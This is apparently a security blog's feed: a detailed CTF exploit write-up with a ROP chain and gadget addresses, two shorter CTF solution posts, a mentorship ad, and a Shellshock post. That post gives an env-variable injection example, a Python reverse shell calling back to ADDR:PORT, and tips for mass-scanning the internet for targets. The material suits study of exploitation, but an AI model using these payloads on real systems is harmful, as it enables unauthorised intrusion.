31C3 CTF: Maze write-up

This is my write-up for the maze challenge in the 31C3 CTF, which I played with the Hacking For Soju team. We “only” got 10th place (out of the 286 teams that scored any points at all), but considering that only capsl, avlidienbrunn and I had time to spend on it (and that I scored 170 of our 340 points, which would have given me the #33 spot if I had played alone), it wasn’t too shabby! :) If I hadn’t been so sleepy/off during large parts of the CTF, I would probably have been able to score a bit more. Greets to capsl for brainstorming about the potential ROP scenarios, btw!

To make this write-up more useful for people that want to learn, I have tried to make it quite detailed.

The information for the challenge was:

The provided tar.gz file contained the binary for the challenge: maze

To run it as a server process on your own system, you can use the following command:

When connecting to the target, the following message is displayed:

Since the name of the challenge is “maze”, and we are presented with a message that states that we can only go east, the valid inputs are presumably east, west, north and south, and we are supposed to navigate through a maze in order to eventually reach some sort of goal. In order to understand exactly what is going on, and to see if there are any vulnerabilities that we can exploit along the way, our next step is to load the binary in IDA Pro and analyze the code. But first, let’s see what kind of protections are enabled for the binary in question, using checksec.sh.

I would suggest that you make a habit of checking which exploit mitigations have been enabled for your target before you start auditing it. For real-world targets, this will give you an idea of the preconditions you will probably have to meet in order to achieve reliable exploitation (e.g. whether an information leak is necessary, and so on). For CTF challenges, it can even provide hints on what kind of vulnerabilities to look for.

In this case, NX is enabled, so we will probably have to use a ROP based payload. PIE (Position-Independent Executable) is not enabled, so we will be able to use ROP gadgets from the executable itself even if ASLR is enabled on the target system. However, the binary is rather small, so there is probably only a limited number of suitable ROP gadgets available. Stack canaries are not enabled, which is a strong indication that the vulnerability to look out for in this case is probably a stack-based buffer overflow.

Do not rely completely on the information you determine this way though. In some cases (e.g. a poorly organized CTF), the binary running on the actual target is slightly different from the one provided, or some protections have been explicitly disabled/enabled on the target system.

Also note that the binary is a 64-bit Linux executable. Analyzing 64-bit (x86_64, to be specific) code has recently become a lot less time consuming, due to the release of Hex-Rays x64. Hex-Rays is an excellent decompiler plugin for IDA Pro, that lets you interactively work with the decompiled code in order to make sense of it. Note that there are still corner-cases that Hex-Rays is not able to handle, especially when dealing with obfuscated code and code that has been explicitly designed in order to make static analysis difficult. If you find something strange in the decompiled code, always perform manual analysis of the assembly code in question.

After the initial pass through the Hex-Rays decompiler, the code shown below is produced (note that irrelevant code, i.e. the automatically inserted stub that calls __libc_start_main() and the code handling initialization and cleanup, has been manually removed from the listing). While reading it, try to see if you can spot the vulnerability:

As you can see, this is a really small and simple program, and the Hex-Rays output is pretty readable as-is. When working with the code in IDA, I can clean things up further though. Renaming functions and variables, changing types and function definitions, adding comments, and manually fixing mistakes made by IDA's automatic code analysis can make the code a lot easier to understand, and make it easier to spot vulnerabilities.

After working with the code manually in IDA for a while, we end up with the following code. If you have not found the vulnerability yet, look for it once again while reading through the updated code listing:

If you did not find the vulnerability this time either, you need to practice more. ;) In the original code, it was easy to overlook (although still quite visible, when taking the stack/frame pointer offsets in the automatically produced comments into account). In the revised code, the vulnerability is rather obvious though. Note how the decompiled code in the append_highscore() function (originally, sub_400CE0) has changed:



As you can see, 1056 bytes are read into a 1056-byte buffer, but the read begins at offset 1. This means that we are able to overflow the buffer by one byte. While this is obviously a rather contrived example, off-by-one vulnerabilities are often found in the wild as well. Typical cases include code like buf[sizeof(buf)] = X, or allocating room for strings without taking the terminating NUL byte into account.

So, what can we accomplish with a 1-byte overflow? Well, that obviously depends on what is stored right after the buffer in question, and on whether our target runs on a little-endian or a big-endian architecture. On little-endian architectures, including x86 and x86_64, the least significant byte (LSB) of a value, including pointers, is stored first. So, if we are overwriting the LSB of an address that is originally 0xbadc0ded, it is the ‘ed’ at the end of the address that will be overwritten, and not the ‘ba’ at the beginning. To make this clearer, here is an illustration of how the 32-bit value 0xbadc0ded is stored in memory (each hex character represents 4 bits, so one byte is represented by two hex characters):


Overwriting the LSB of an address will thus shift it slightly, by up to 255 bytes depending on what the original value was. If the original value is 0x123456, overwriting the LSB with 00 will change it to 0x123400, effectively subtracting 0x56 from the original value. So, what is stored right after our buffer in this case? Well, the automatically produced comment for our buf variable reveals that right away. “[bp-420h]” means that the buffer is located at rbp (the current base/frame pointer value) minus 0x420 (and 0x420 = 1056). Note that rbp points to the location of the saved rbp value, which will be restored when returning from the function. Our 1-byte overflow will overwrite the least significant byte of the saved rbp value, which means that we will be able to control (part of) rbp after append_highscore() has returned back into reached_goal().
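To make the arithmetic concrete, here is a short Python sketch of the little-endian layout and the effect of overwriting the LSB:

```python
import struct

# 0xbadc0ded stored little-endian: the least significant byte comes first
print(struct.pack("<I", 0xBADC0DED).hex())  # 'ed0ddcba'

# Overwriting the first (least significant) byte of a stored value with
# 0x00 only shifts it down slightly; the high bytes are untouched.
addr = 0x123456
print(hex(addr & ~0xFF))  # 0x123400
```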

Regarding frame pointers, note that they are actually forming a linked list. The current frame pointer value (rbp) points to the saved frame pointer value in the current function’s stack frame, and the saved frame pointer value points to the saved frame pointer of the calling function’s stack frame, and so on. Below you can see how the stack frames for each function in maze are linked together, at the time when append_highscore() is executed. Since the stack grows down, towards lower addresses, the ‘buf’ buffer in append_highscore()’s stack frame is stored at a lower address than all the saved frame pointer values.

maze stack

This description is a bit simplified though, since each function, including append_highscore(), saves a few other registers as well. This is not apparent in Hex-Rays, but looking at the actual assembly code in IDA, we can see that the stack space reserved for the buffer is actually 0x408 = 1032 bytes. Since this probably includes some extra padding added by gcc, the original buffer in the source code was probably smaller than this. Most likely it was declared as 1016 bytes, and buf[1016] = ‘\0’ was actually buf[sizeof(buf)] = ‘\0’ in the original source code. Also, since the contents of the rbx register is pushed to the stack right before the stack space for buf is reserved, this means that the LSB of the saved rbx register is overwritten with a NUL byte regardless of whether we exploit the overflow via read() or not.

function prologue for append_highscore()

When returning from append_highscore(), back into reached_goal(), the saved contents of the rbx, r12 and r13 registers are restored from the stack, as well as the saved frame pointer (rbp). In this case, reached_goal() does not use any of those registers before returning into main(), but if it did, that could potentially have resulted in other exploitable scenarios as well. Even though it did not matter in this particular case, always aim for a complete understanding of everything that is going on, since there will be times when paying attention to those small details is crucial to success.

If reached_goal() had referenced any local stack variables after append_highscore() returned, and the assembly code referencing those variables used the base/frame pointer, that could have resulted in potentially exploitable side effects as well. In cases such as this, where the function calling the vulnerable function returns to a function one step further up the call chain, an even more convenient opportunity arises though. For code that is compiled to use frame pointers, the function epilogue usually ends with “leave; ret”, or equivalently, “mov rsp, rbp; pop rbp; ret”. As you can see, this sets rsp = rbp (i.e. if we control the contents of rbp, we now control the stack pointer), pops the new rbp value, and finally returns (i.e. pops the return address, using the stack pointer that is now under our control). Looking at the code, we can see that it uses a variation of this that sets rsp = rbp-0x28, restores 5 registers (5*8 = 40 = 0x28), and then pops rbp and returns.

function epilogue for reached_goal()

So, by exploiting the 1-byte overflow of a stack buffer in append_highscore(), we are actually able to control the stack pointer when returning from the reached_goal() function. In other words, we control where the return address is about to be retrieved from. Pointing rsp into a buffer whose contents we control thus allows us to control the return address. Ideally, we want to point rsp into a buffer containing a full ROP chain to exploit the program in question. If we had known the address of the system() function, and if the RDI register (which holds the first function argument in the standard x86_64 ABI) had contained the address of a buffer under our control, the full ROP chain would have consisted of nothing but a return into system(). :) Always keep in mind the parameters under your control (register values, buffer contents, and so on), the information you currently have (base addresses of libraries, the executable, stack/heap addresses, and so on), and what information you can potentially deduce. Sometimes there are case-specific shortcuts you can take in order to achieve reliable exploitation of a particular target.

As I mentioned earlier, overwriting the least significant byte of the saved rbp value allows us to shift it to an address slightly further up or down the stack, by up to 255 bytes (up to 248 bytes in this case, since the saved rbp value will obviously be aligned to an 8-byte boundary). Shifting it to a higher address will not do us any good, since we do not control the contents of any stack buffers allocated there. Shifting it to a lower address can potentially point it into the ‘buf’ buffer though, depending on what the LSB of the original saved rbp value is. By overflowing with a NUL byte, we ensure that we subtract as much as possible from the saved rbp value, maximizing our chances of pointing rbp into our buffer.
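In other words, a NUL-byte overflow subtracts exactly the original LSB from the saved value; a quick sanity check in Python:

```python
def nul_overflow(saved_rbp):
    """Simulate overwriting the least significant byte with 0x00."""
    return saved_rbp & ~0xFF

# The amount subtracted equals the original LSB; since the saved rbp is
# aligned to an 8-byte boundary, the maximum shift is 0xF8 = 248 bytes.
saved = 0x7FFFFFFFE0F8
print(hex(nul_overflow(saved)))     # 0x7fffffffe000
print(saved - nul_overflow(saved))  # 248
```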

Due to ASLR, the LSB of the saved rbp value will vary (and sometimes, the LSB will even be 0 to begin with), so it is possible that we need to make a few attempts in order to exploit this. When ASLR is enabled, the base address (and once again, keep in mind that the stack grows down towards lower addresses) of the stack will be randomized, and unlike the randomization of base addresses for dynamically loaded libraries, and PIE-binaries, the offset within the memory page will be randomized as well. For libraries/PIE-binaries, the 12 least significant bits will always remain the same, and can be used to narrow down the potential binary versions that are running on a system that you are exploiting in cases where you have found an information leak.

We now know where the vulnerability is, and have a rough idea of how to exploit it (i.e. overflow the LSB of the saved rbp with a NUL byte, hoping that this is enough to point it into our buffer, where we will store a ROP chain). This was the easy part. ;) To actually trigger the vulnerability, it turns out that we have to solve the maze. Since the maze is fairly large (179×95), we obviously don’t want to go through the process of solving it manually on each exploitation attempt (as I mentioned, the exploit will not work every time due to ASLR). Since the maze is static and hardcoded into the binary, we can just solve it once and send the solution after connecting.

Initially, I decided to make a small Python script in order to visualize the maze. By analyzing the slightly hairy algorithm of check_valid_moves_loop, we can deduce that maze_map[] is actually an array containing the x and y coordinates of all the occupied squares (the walls) in the maze. Even if we had not been able to deduce this from the code alone, it could have been deduced by analyzing the data in the array in question, especially when visualizing it. :)
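The original extraction script operated on the actual binary; the sketch below illustrates the same idea with a hypothetical on-disk format (a flat blob of little-endian 32-bit (x, y) pairs) and an ASCII rendering instead of a PNG:

```python
import struct

def parse_walls(data):
    """Unpack a flat blob of little-endian 32-bit (x, y) pairs."""
    count = len(data) // 8
    pairs = struct.unpack("<%dI" % (2 * count), data)
    return list(zip(pairs[0::2], pairs[1::2]))

def render_ascii(walls, width, height):
    """Draw occupied squares (walls) as '#' on an empty grid."""
    grid = [[" "] * width for _ in range(height)]
    for x, y in walls:
        grid[y][x] = "#"
    return "\n".join("".join(row) for row in grid)

# Tiny example: a 4x3 "maze" with walls along the top row
blob = b"".join(struct.pack("<II", x, 0) for x in range(4))
print(render_ascii(parse_walls(blob), 4, 3))
```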

I made this script to extract the maze data from the binary, and create a PNG file:

This is the resulting PNG file:

I then wrote a simple recursive algorithm in order to solve the maze:
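The solver can be sketched as a straightforward recursive depth-first search over the wall set (the coordinate conventions below are assumptions for illustration, not the original code):

```python
import sys

MOVES = {"east": (1, 0), "west": (-1, 0), "south": (0, 1), "north": (0, -1)}

def solve(walls, start, goal, width, height):
    """Recursive DFS; returns a list of moves such as ['east', 'south']."""
    sys.setrecursionlimit(width * height + 1000)
    seen = set()

    def walk(pos):
        if pos == goal:
            return []
        seen.add(pos)
        x, y = pos
        for move, (dx, dy) in MOVES.items():
            nxt = (x + dx, y + dy)
            if (0 <= nxt[0] < width and 0 <= nxt[1] < height
                    and nxt not in walls and nxt not in seen):
                path = walk(nxt)
                if path is not None:
                    return [move] + path
        return None

    return walk(start)

# A 3x1 corridor with no walls: two steps east
print(solve(set(), (0, 0), (2, 0), 3, 1))  # ['east', 'east']
```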

By connecting and sending the full solution to the maze we reach the vulnerable part of the code, i.e. the code that reads a name to add to the highscore list, in a fraction of a second. So, even if we need to make a few attempts in order to exploit it, due to ASLR, it will not make any real difference for us. Time to pwn. ;)

Since the binary is so small, we don’t have a lot of suitable ROP gadgets to play with. We need to find ways to use the ones we have as effectively as possible. My first attempt was to see if I could return into reached_goal(), right before the call to fopen(). We don’t actually need code execution on the target to solve this challenge; to get the flag, we only need to be able to read a file (and based on the other levels, it seemed like a reasonable guess that the flag was stored in either /home/user/flag or /home/user/flag.txt). The code in reached_goal() reads the current highscore file, and prints the last of the names in question.

There is a problem with this approach though. We need to populate RDI with a pointer to a string containing the filename we want to read, and at this point, we do not know the address of any buffer under our control. This problem can be solved by returning into read(), though, in order to populate a buffer at an address of our choosing. A suitable address for this purpose must obviously be valid and writable, and since the target is a non-PIE binary, the data segment of the executable itself resides at a fixed and known address. We can simply use 0x6060A0, which is the address of the .data section.

Note that read() is a libc function, and since we do not know the address where libc is mapped, we cannot return directly into it. If we had known the libc base address, we could have just returned into system() at this point, after populating RDI with the address of the “/bin/sh” string within libc itself. We solve this by returning into the PLT entry for read(), since read() is one of the functions imported by the non-PIE target binary. The PLT entry for read(), which acts as a trampoline into read() in libc, is stored at 0x400850.

Since read() takes three arguments, which are passed in RDI, RSI and RDX respectively, we need a ROP chain that populates those registers before returning into read(). Ideally, our target binary would have contained instruction sequences such as “pop rdi; ret”, “pop rsi; ret” and “pop rdx; ret”, or even “pop rdi; pop rsi; pop rdx; ret”, but those instruction sequences are not commonly found in practice. Since x86 and x86_64 use variable-length instructions that do not have to be aligned to any n-byte boundary, it is possible to return into the middle of existing instructions though. By looking at partial instructions as well, we can find “pop rdi; ret” at 0x400f63 (the “pop rdi” instruction, opcode 0x5F, is actually the second byte of the “pop r15” instruction) and “pop rsi; pop r15; ret” at 0x400f61 (the “pop rsi”, opcode 0x5E, is the second byte of a “pop r14” instruction), as you can see below:
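The trick is easy to see at the byte level: `pop r15` is encoded as a REX.B prefix (0x41) followed by the same opcode as `pop rdi` (0x5F), so starting execution one byte into the instruction stream yields different, perfectly valid gadgets. Assuming a `pop r14; pop r15; ret` sequence starting at 0x400F60:

```python
# "pop r14; pop r15; ret" as raw bytes (REX.B prefix 41 before each pop)
full = b"\x41\x5e\x41\x5f\xc3"

print(full[1:].hex())  # '5e415fc3' -> pop rsi; pop r15; ret  (0x400F61)
print(full[3:].hex())  # '5fc3'     -> pop rdi; ret           (0x400F63)
print(full[4:].hex())  # 'c3'       -> ret                    (0x400F64)
```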


It doesn’t matter that there is a “pop r15” instruction between the “pop rsi” and the “ret” instruction. As long as we are able to populate the registers we care about, without side effects that cause the program to crash (invalid memory accesses, etc.), it suits our purposes just fine.

Looking for ROP gadgets manually can be time-consuming though, especially for small binaries where there are few naturally occurring instruction sequences that are useful. Alternatives include using PEDA (Python Exploit Development Assistance for GDB), as can be seen below:

As you can see above, there are unfortunately no suitable “pop rdx” gadgets. There may be other ways for us to populate RDX though, and for our purposes, we don’t need any specific value; any non-zero value that is not too small is fine. The code we want to execute is read(0, ptr, N), where ptr is a pointer to a buffer that we are reading data into and N just needs to be at least as large as the data we want to read. As long as RDX still contains a non-zero value after the read(), even 1 would have been OK, since we could chain multiple calls to read().

For a more complete listing of ROP gadgets, that we can inspect manually in order to see if we can find anything useful, the ROPgadget tool by Jonathan Salwan can be used:

There do not seem to be any obvious gadgets for setting RDX, and unfortunately, RDX is set to 0 by the time the function epilogue for reached_goal() is executed (as a side effect of the call to fclose() before returning from append_highscore(), at least when running it on my own system while testing). Since RDX can be set as a side effect of calling functions, we can try looking for “harmless” functions to return into in order to set RDX to a non-zero value.

We also still have the problem of not knowing the base address of libc, and maybe there’s a way to solve both of these problems at once. :) By returning into the PLT-entry for puts(), that prints a string (or rather, prints any data up until the first NUL-byte it encounters), with RDI set to an address that contains a pointer into libc (such as a GOT-entry), we are able to both set RDX as a side-effect of the call to puts(), as well as leak a libc address that can be used to calculate the address of arbitrary libc functions. The fact that puts() also happens to set RDX as a side-effect was just a lucky coincidence, but if it hadn’t, there were a number of other functions we could try to call for that purpose.

Our original plan of simply returning into reached_goal(), right before the call to fopen(), is now obsolete. Since we have now leaked a libc address, we can simply use the read() in order to read a second stage ROP chain into a known location and then pivot the stack into that. The exploit will read the leaked address (a pointer to puts() in libc, by reading the GOT-entry for puts() in the address space of the non-PIE binary), calculate the base address of libc from that, and then the address of system(). Since we have just read arbitrary data into a known location, we can also place an arbitrary command string to be executed there, rather than using the “/bin/sh” string from libc. This also makes it more suitable for cases where we don’t know which libc version is used on the target system, since we only have to bruteforce one offset (between puts() and system()) rather than also having to know the address of the “/bin/sh” string. Another possibility, in that case, would be to use puts()-calls to leak data at page-boundaries below the leaked puts()-address, in order to find the base address of libc, and then implement symbol resolving by parsing the ELF header. That was actually what I ended up doing on the cfy-challenge, after my attempts that assumed an Ubuntu 14.04 libc failed (it turned out to be Ubuntu 14.10). :P
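The address calculation itself is plain offset arithmetic. The offsets below are hypothetical placeholders; in a real exploit they come from the target's libc build (e.g. from its symbol table):

```python
import struct

# Hypothetical libc offsets, for illustration only
PUTS_OFFSET = 0x6FD60
SYSTEM_OFFSET = 0x46590

def libc_addresses(leak):
    """Derive the libc base and system() from a leaked puts() pointer.

    puts() stops at the first NUL byte, so the leak is typically 6 bytes
    on x86_64; pad it up to a full 8-byte little-endian value.
    """
    leaked_puts = struct.unpack("<Q", leak[:8].ljust(8, b"\x00"))[0]
    libc_base = leaked_puts - PUTS_OFFSET
    return libc_base, libc_base + SYSTEM_OFFSET

base, system = libc_addresses(struct.pack("<Q", 0x7F0123400000 + PUTS_OFFSET)[:6])
print(hex(base), hex(system))
```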

The only remaining piece of the puzzle at this point is the set of gadgets needed to perform the stack pivot into our second-stage ROP chain. For this, we can use a “pop rbp; ret” gadget, found at address 0x400AB0, in order to populate RBP. Then we use the “leave; ret” equivalent in the function epilogue of reached_goal(), which I mentioned earlier, in order to point RSP into our second-stage ROP chain. For the first-stage ROP chain we also need a simple ret gadget (such as the one at 0x400F64), since we do not know the exact offset into our buffer where the stack will be shifted (it varies with each execution). By filling the start of the buffer with addresses of ret instructions, execution will keep on returning until it reaches the ROP chain that we have placed at the end of the buffer.

To sum it up. The gadgets we need are:

  • 0x400F64: Prepended to ROP chain for “NOP sled” effect (ret)
  • 0x400F63: Set RDI, i.e. the 1st function argument (pop rdi; ret)
  • 0x400F61: Set RSI, i.e. the 2nd function argument (pop rsi; pop r15; ret)
  • 0x400AB0: Set RBP, to prepare for the stack pivot (pop rbp; ret)
  • 0x400E96: Stack pivot (lea rsp, [rbp-0x28]; pop {rbx,r12-r15,rbp}; ret)

Note that the first three gadgets overlap: the “pop rsi; pop r15; ret” sequence at 0x400F61 contains both the “pop rdi; ret” at 0x400F63 and the plain ret at 0x400F64.

Besides these ROP gadgets, we also need:

  • 0x606028: GOT-entry for puts(), used to leak a libc address
  • 0x400850: PLT-entry for read(), returned into to read our 2nd stage ROP chain
  • 0x4007F0: PLT-entry for puts(), returned into to print the leaked address
  • 0x606XXX: Scratch buffer, that our 2nd stage ROP chain is read into
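Putting these pieces together, the first-stage chain can be assembled along the following lines (a sketch based on the addresses above; the sled length and exact layout are illustrative, not the verbatim exploit):

```python
import struct

def p64(v):
    return struct.pack("<Q", v)

RET      = 0x400F64  # ret ("NOP sled" effect)
POP_RDI  = 0x400F63  # pop rdi; ret
POP_RSI  = 0x400F61  # pop rsi; pop r15; ret
POP_RBP  = 0x400AB0  # pop rbp; ret
PIVOT    = 0x400E96  # lea rsp, [rbp-0x28]; pop rbx,r12-r15,rbp; ret
PUTS_GOT = 0x606028
READ_PLT = 0x400850
PUTS_PLT = 0x4007F0
SCRATCH  = 0x606500  # where the 2nd stage ROP chain is read to

chain  = p64(RET) * 64                 # ret sled; rsp lands somewhere here
chain += p64(POP_RDI) + p64(PUTS_GOT)  # rdi = &GOT[puts]
chain += p64(PUTS_PLT)                 # leak puts@libc (also sets rdx != 0)
chain += p64(POP_RDI) + p64(0)         # rdi = 0 (stdin)
chain += p64(POP_RSI) + p64(SCRATCH) + p64(0)  # rsi = buf; junk for r15
chain += p64(READ_PLT)                 # read(0, SCRATCH, rdx)
chain += p64(POP_RBP) + p64(SCRATCH + 0x28)
chain += p64(PIVOT)                    # rsp = SCRATCH; 6 pops; then ret

# The pivot pops 6 qwords (rbx, r12-r15, rbp) starting at SCRATCH, so the
# 2nd stage buffer needs 6 qwords of padding before its first return address.
print(len(chain))
```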

Initially, I used 0x6060A0 as the scratch buffer address, i.e. the start of the .data section. That resulted in running out of stack space in system() though, since the memory below this address is used as stack space by the functions we return into from our 2nd stage ROP chain. I changed it to 0x606500 to give the stack more room to grow, and now we finally have a full working exploit. :)

As a final touch, I implemented support for providing a full interactive pty-session rather than a lousy interactive shell with no job control. ;) What good is pwning, if you can’t run vim on your targets?! :)

Sample session:

Note that you may have to run it multiple times to succeed, due to ASLR. If arrow-up+enter is too cumbersome, just run while true; do ./maze-xpl.py; done :)

Source code for exploit provided below:

Ghost in The Shellcode 2015 Teaser: Citadel solution

This is my exploit for the Citadel challenge in the Ghost in The Shellcode 2015 Teaser CTF. I have attached my IDB as well, so those of you with IDA Pro can see what the reversing-part of the process looked like.

The Citadel challenge consisted of a custom SIP server (Linux/x86_64), with NX, ASLR and partial RELRO enabled. After some time reverse-engineering the binary, I discovered a format string vulnerability in a call to asprintf(). However, to actually get data under our control on the stack, in order to use the format string vulnerability effectively, I had to do some further digging…

My final exploit code:

Below you can see the output of the exploit. :)

The vulnerable binary:

My IDB for the binary:

Ghost in The Shellcode 2015 Teaser: Don’t Panic! Shift Keying! Solution

This was the only challenge remaining for us (ClevCode Rising) in the GITS 2015 Teaser CTF (http://ghostintheshellcode.com/2015-teaser/final_scores.txt), after I had solved the Citadel challenge and my team mate Zelik had solved Lost in Time. With no previous GNU Radio experience, I tried my luck, and came very close to solving this in time to win the entire CTF. Unfortunately, I had reversed the output bits from the deinterleave block… Next time, I won’t make the same mistake. ;)

Since it was a pretty fun challenge, I took the time to fix up my GNU Radio Companion diagram after the challenge ended and I had been made aware of my mistake, and made a cleaned up and minimized Python solution script as well.

This was the information given in the challenge:

Along with this picture:

And this data file:

My final solution was this piece of Python code:

Or, this GNU Radio Companion file:

Which yields this image, containing the flag! :)

Unique Opportunity – Mentorship for a Select Few (and maybe a new team?)

This post is directed to the people that share my interest in learning and understanding IT-security on a deeper level than most (vulnerability research, exploit development, reverse-engineering). The ones that are not interested in merely learning the tools of the trade, in order to do what any trained monkey would be able to do. Pointing and clicking, using scanners and tools made by other people, to detect and exploit vulnerabilities discovered by other people, without even necessarily having a basic understanding of the actual bugs that are being exploited. Those kinds of things have never had any appeal to me. I want to discover, I want to understand, and I never ever want to stop learning.

While the single best way to learn anything is by doing, having a knowledgeable mentor can speed up the process tremendously. He or she can guide you in the process, provide you with information and challenges chosen to take you from where you are now to where you want to be, and give you a helping hand if or when you get stuck. During my own journey, I have never had the luxury of having a mentor myself. I have, however, had the opportunity to teach and pass on some of my knowledge to willing students a few times. In those cases each student (or rather, the – usually government/defense related – clients that sent them to me) had to pay several thousands of dollars for my services. This time, I have something different in mind…

Perhaps you are currently a “web hacker”, knowing your way around things like XSS, XSRF, LFI/RFI, SQLi and command injection attacks, but want to delve into the realms of binary exploitation and reverse-engineering. Perhaps you are currently more into hardware hacking, and want to learn more about the software side of things, or perhaps you are well versed within the field of cryptography but want to have a better understanding of the software flaws that can often be used to circumvent it completely. Perhaps you are a beginner to the IT-security field, but with an ability to quickly learn and understand whatever you set your mind to.

I am searching for people with potential. Your current level of knowledge is not the most important part, rather, I want you to have the right kind of mindset to go a long way. I don’t care about whether you are a college dropout or a PhD, or if you are in fact still in school. Degrees, certifications and titles tell me absolutely nothing worth knowing. I do care about whether you have that same insatiable desire to learn and understand the world in general, and computers, networks and IT-security in particular, that has taken me to where I am today. You should have a genuine desire to learn, and a willingness to spend the time and energy it will require.

I will provide you with resources, I will give you challenges and hints about how to proceed to overcome them, adapted to your current level of knowledge. I will review your work, and give you information and suggestions on what you can do to improve even further. If or when you reach a certain level, I may even be able to provide you with some work for paying clients (if that’s of interest). If you really have potential, and live up to it, there will always be opportunities.

By now you might be wondering what the catch is, and you would be right to do so. I do not want your money, but I do want some of your time, and some of the talent you can provide. I am currently in the position of having a lot of ideas about things I would like to do, but far too little time to spend on them myself. A lot of these ideas revolve around the web, creating certain sites and services, or small applications (including mobile ones). Some of them are security related, and some of them are completely unrelated to security. Although none of them would be impossible for me to do on my own, I have slowly but surely come to the realization that it would take me a lot more time and effort to do these things than for someone that is already experienced within these fields, and time is something that I have far too little of already. In general, I have always avoided anything that has to do with developing user interfaces, so that is an area I am admittedly weak at. I do have strong opinions on how I would like them to look and work though. Although functionality always trumps beauty, aesthetics are important to me. In code, as well as in the visual side of things.

So, if you are experienced with rapid development and/or prototyping of web sites, including the backend, and/or mobile development, your chances of being chosen are definitely increased. The technologies I would prefer for these purposes are Node.js (perhaps in combination with the full “MEAN” stack: Node, Angular, Express, MongoDB) in the backend, and probably Bootstrap in the frontend. Experience with building REST APIs, real-time web applications and customized widgets and components is a plus. I have spent some time researching various alternatives for developing the types of sites and services I would like to create, and those technology choices are what I am currently leaning towards, but feel free to make other suggestions if you feel you have something else to bring to the table. A smaller subset of my ideas also require hardware-hacking experience and/or low-level driver development, so those kinds of skills may be interesting to me as well.

As part of your training, my plan is also to let you participate in CTF competitions. I am currently competing with HackingForSoju, although we (and me in particular) have not been as active this year as we would have liked to. Last year, when we tried to be a bit more active, our team ranked between #4 and #7 in the world at ctftime.org (out of 3529 teams in total, to give you some perspective). This year we are currently at a modest 28th place (out of 4382 teams), but that’s a direct result of being so inactive (even when we have participated in a CTF, usually only a few of us have been able to play, and often only for a small part of the CTF). Personally, I have not been able to participate since Codegate (where we got 2nd place in the quals, and 6th place in the finals). My plan is to try to be a bit more active again in the future, and participate in some competitions with HackingForSoju and some with the people I’m mentoring. If I find 10 people (which is probably very optimistic, but one can always dream) with real potential, my goal would be to get you in the top 10 within a year.

If you are interested, send me a comment through the Contact-page, or send me an e-mail at je [at] clevcode [dot] org.

Anyway, if you are not already acquainted with me and my work in the IT-security field, it’s quite natural to want to know a bit more before considering this opportunity. As for my professional background, you can take a look at my CV. In short, I have participated in a number of challenges and competitions over the years, I have led teams of talented IT-security researchers, I have been a speaker at conferences such as BlackHat, DefCon and the RSA Conference, and I have found vulnerabilities and created exploits for a number of targets (including smartphone and kernel vulnerabilities). Due to the sensitive nature of many of my clients, a lot of the research I have done remains confidential (including the most interesting parts), but there should be enough public information available to give you a pretty good idea of the kind of skills I provide. :) If you have not already done so, browsing the rest of this site is a good idea as well.

CVE-2014-6271 / Shellshock & How to handle all the shells! ;)

For the TL;DR generation: If you just want to know how to handle all the shells, search for “handling all the shells” and skip down to that. ;)

CVE-2014-6271, also known as “Shellshock”, is quite a neat little vulnerability in Bash. It relies on a feature in Bash that allows child processes to inherit shell functions that were defined in the parent. I have played around with this feature before, many years ago, since it could be abused in another way in cases where SUID programs execute external shell scripts (or use system()/popen() when /bin/bash is the default system shell), and with certain daemons that support environment variable passing. When a SUID program is the target, it must first do something like setuid(geteuid()) for this to be exploitable, since inherited shell functions are not accepted when the UID differs from the EUID. When SUID programs call out to shell script helpers (that need to be executed with elevated privileges), this is usually done, since most shells automatically drop privileges when starting up.

In those cases, it was possible to trick Bash into executing a malicious shell function even when PATH is set explicitly to a “safe” value, or even when the full path is used for all calls to external programs. This was possible due to Bash happily accepting slashes within shell function names. :) This example demonstrates this problem, as well as the new (and much more serious) CVE-2014-6271 vulnerability.
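The snippet itself is not reproduced here, but based on the description it can be reconstructed along these lines (with `echo cmd1-ran` and `echo cmd2-ran` standing in for cmd1 and cmd2). On a vulnerable bash, “cmd2” executes as soon as bash starts, and “cmd1” executes in place of id despite the full path being used; on a patched bash, the command prints nothing:

```shell
# The variable *name* is "/usr/bin/id" and its value contains both a function
# definition (cmd1, abusing slashes in function names) and a trailing command
# (cmd2, the CVE-2014-6271 part executed at startup).
env '/usr/bin/id=() { echo cmd1-ran; }; echo cmd2-ran' \
    bash -c '/usr/bin/id > /dev/null'
```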

As you can see, the environment variable named “/usr/bin/id” is set to “() { cmd1; }; cmd2”. Due to the CVE-2014-6271 vulnerability, any command that is provided as “cmd2” will be immediately executed when Bash starts. Due to the peculiarity I was already familiar with, the “cmd1” part is executed when trying to run id in a “secure” manner by providing the full path. :)

One of the possibilities that crossed my mind when I learned about this vulnerability was exploiting it over the web, since CGI programs use environment variables to pass various pieces of information that can be arbitrarily controlled by an attacker. For instance, the user-agent string is normally passed in the HTTP_USER_AGENT environment variable. It turns out I was not alone in thinking about this, and shortly after information about the “Shellshock” vulnerability was released, Robert Graham at Errata Security started scanning the entire internet for vulnerable web servers. Turns out there are quite a few of them. :) The scan is quite limited in the sense that it only discovers cases where the default page (GET /) of the default virtual host is vulnerable, and it only uses the Host-, Referer- and Cookie-headers; the User-Agent header is another convenient vector. Another way to find lots of potentially vulnerable targets is to do a simple Google search for “inurl:cgi-bin filetype:sh” (without the quotes). As you may have realized by now, the impact of this vulnerability is enormous.

So, now to the part about handling all the shells. ;) Let’s say you are testing a large subnet (or the entire internet) for this vulnerability, and don’t want to settle for a ping -c N ADDR payload like the one Robert Graham used in his PoC. A simple netcat listener is obviously no good, since it can only deal with a single reverse shell. My solution gives you as many shells as the number of windows tmux can handle (a lot). :)

Let’s assume you want a full reverse-shell payload, and let’s also assume that you want a full shell with job control and a pty instead of the less convenient one you usually get under these circumstances. Assuming a Python interpreter is installed on the target, which is usually a pretty safe bet nowadays, I would suggest a payload such as this (with ADDR and PORT replaced with your IP and port number, of course):
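The payload itself is not reproduced here; a sketch of the standard Python pty trick, written as a function for readability (on a target you would inline it as a `python -c` one-liner, as in the comment at the bottom), looks like this:

```python
import os
import pty
import socket

def reverse_shell(addr, port):
    """Connect back to addr:port and serve an interactive /bin/sh on a pty."""
    s = socket.socket()
    s.connect((addr, port))
    # Wire stdin/stdout/stderr to the socket so the shell talks to the listener.
    for fd in (0, 1, 2):
        os.dup2(s.fileno(), fd)
    # pty.spawn allocates a real pty, giving job control and sane line handling.
    pty.spawn("/bin/sh")

# One-liner equivalent for use on the target (ADDR/PORT are placeholders):
#   python -c 'import socket,os,pty;s=socket.socket();s.connect(("ADDR",PORT));
#   [os.dup2(s.fileno(),f) for f in (0,1,2)];pty.spawn("/bin/sh")'
```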

To try this out, just run this in one shell to start a listener:

Then do this in another shell:

